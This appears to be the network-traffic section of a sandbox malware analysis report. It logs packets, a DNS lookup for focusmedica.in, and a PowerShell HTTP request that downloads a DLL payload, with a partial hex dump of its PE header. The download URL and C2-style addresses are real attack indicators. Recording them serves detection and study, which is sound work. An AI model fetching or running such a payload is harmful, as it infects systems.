                                                                                                                                                                                  Apr 26, 2022 09:46:25.173072100 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173163891 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173187971 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173213005 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173269987 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173356056 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173408031 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231297016 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231359959 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231400013 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231476068 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231508970 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231626987 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231709003 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296827078 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296888113 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296904087 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296977043 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296994925 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.297036886 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.297169924 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.297236919 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.346607924 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.346669912 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.346710920 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.347053051 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.347243071 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393440008 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393500090 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393521070 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393620014 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393681049 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393738985 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393810034 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393867016 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460781097 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460843086 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460887909 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460900068 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460936069 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460942030 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.461072922 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.461148024 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.542867899 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.542917013 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.542998075 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543067932 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543080091 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543164968 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543338060 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543426037 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622102976 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622180939 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622188091 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622242928 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622246027 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622306108 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622400999 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622596979 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.711987019 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712052107 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712096930 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712127924 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712182045 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712227106 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712235928 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712241888 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.775639057 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.775701046 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.775768042 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.775799990 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.775809050 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.775957108 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.776042938 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.776128054 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.827733040 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.827800989 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.827871084 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.827913046 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.828038931 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.828100920 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.828248024 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.828321934 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.868046045 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.868087053 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.868175030 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.868226051 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.868310928 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.868417025 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.868581057 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.868877888 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.912647009 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.912698030 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.912786007 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.912837982 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.912906885 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.913023949 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.913085938 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.913177967 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.963274956 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.963363886 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.963380098 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.963593006 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.963653088 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.963669062 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.963848114 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.967037916 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.019526958 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.019610882 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.019618034 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.019665003 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.019848108 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.019951105 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.020073891 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.022224903 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.102833033 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.102890015 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.102941036 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.102965117 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.103085995 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.103132963 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.103147984 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.103219032 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.180556059 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.180655956 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.180727959 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.180742979 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.180788994 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.180795908 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.180886030 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.181153059 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.229222059 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.229274035 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.229309082 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.229342937 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.229545116 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.229796886 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.230927944 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.279706955 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.279733896 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.279750109 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.279763937 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.279829025 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.279865026 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.327749968 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.327825069 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.327857971 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.327868938 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.327908993 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.327979088 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.373739004 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.373794079 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.373850107 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.373903990 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.373910904 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.373939037 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.410108089 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.410147905 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.410197020 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.410226107 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.410253048 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.410303116 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.462759972 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.462821007 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.462860107 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.462876081 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.462946892 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.462954044 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.463052034 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.463198900 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.518039942 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.518095016 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.518132925 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.518153906 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.518188953 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.518201113 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.518205881 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.518264055 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.562444925 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.562500000 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.562541008 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.562576056 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.562582970 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.562619925 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.562627077 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.562632084 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.601100922 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.601166010 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.601241112 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.601283073 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.601408005 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.601450920 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.601484060 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.601541996 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:26.758311987 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:26.758392096 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:29.602402925 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:29.602878094 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:34.415591955 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:56.833834887 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:46:56.856914997 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:56.860356092 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:46:56.891932011 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:46:56.914777994 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:56.933388948 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:56.933442116 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:56.933497906 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:46:58.844877005 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:46:58.868572950 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:58.868748903 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:46:58.874234915 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:46:58.939033985 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:59.403727055 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:59.403817892 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:47:02.405256987 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:47:02.405313969 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:47:02.405428886 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:47:02.405487061 CEST497568080192.168.2.3138.201.142.73

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Apr 26, 2022 09:46:22.610363960 CEST5772353192.168.2.38.8.8.8
                                                                                                                                                                                  Apr 26, 2022 09:46:22.626599073 CEST53577238.8.8.8192.168.2.3

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                  Apr 26, 2022 09:46:22.610363960 CEST192.168.2.38.8.8.80x5dcaStandard query (0)focusmedica.inA (IP address)IN (0x0001)

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                  Apr 26, 2022 09:46:22.626599073 CEST8.8.8.8192.168.2.30x5dcaNo error (0)focusmedica.in166.62.28.147A (IP address)IN (0x0001)

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • focusmedica.in

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  0192.168.2.349747166.62.28.14780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  Apr 26, 2022 09:46:23.079543114 CEST1073OUTGET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                                  Host: focusmedica.in
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356245995 CEST1074INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Tue, 26 Apr 2022 07:46:23 GMT
                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                  X-Powered-By: PHP/7.3.33
                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Tue, 26 Apr 2022 07:46:23 GMT
                                                                                                                                                                                  Content-Disposition: attachment; filename="EeL9HdVdV8PNPDkaAx3wjw.dll"
                                                                                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                                                                                  Set-Cookie: 6267a34f2b816=1650959183; expires=Tue, 26-Apr-2022 07:47:23 GMT; Max-Age=60; path=/
                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                  Connection: Upgrade, Keep-Alive
                                                                                                                                                                                  Last-Modified: Tue, 26 Apr 2022 07:46:23 GMT
                                                                                                                                                                                  Content-Length: 473088
                                                                                                                                                                                  Keep-Alive: timeout=5
                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 83 4d e9 75 c7 2c 87 26 c7 2c 87 26 c7 2c 87 26 e0 ea ea 26 c0 2c 87 26 e0 ea fc 26 d2 2c 87 26 c7 2c 86 26 c0 2e 87 26 d9 7e 04 26 44 2c 87 26 d9 7e 12 26 cd 2c 87 26 d9 7e 03 26 4b 2c 87 26 d9 7e 15 26 c6 2c 87 26 d9 7e 13 26 c6 2c 87 26 d9 7e 16 26 c6 2c 87 26 52 69 63 68 c7 2c 87 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 32 09 67 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 09 00 00 fa 02 00 00 3a 04 00 00 00 00 00 08 02 02 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 c0 07 00 00 04 00 00 01 e9 07 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 0f 04 00 4f 00 00 00 18 f4 03 00 b4 00 00 00 00 e0 04 00 4c ae 02 00 00 a0 04 00 c0 33 00 00 00 00 00 00 00 00 00 00 00 90 07 00 b4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 b0 08 00 00 78 f3 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c f8 02 00 00 10 00 00 00 fa 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ff ff 00 00 00 10 03 00 00 00 01 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 86 00 00 00 10 04 00 00 2c 00 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c0 33 00 00 00 a0 04 00 00 34 00 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 4c ae 02 00 00 e0 04 00 00 b0 02 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6a 29 00 00 00 90 07 00 00 2a 00 00 00 0e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00
                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Mu,&,&,&&,&&,&,&.&~&D,&~&,&~&K,&~&,&~&,&~&,&Rich,&PEd2gb" :OL3x@.text| `.rdata@@.data,@.pdata34*@@.rsrcL^@@.relocj)*@B
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356312990 CEST1076INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Data Ascii:
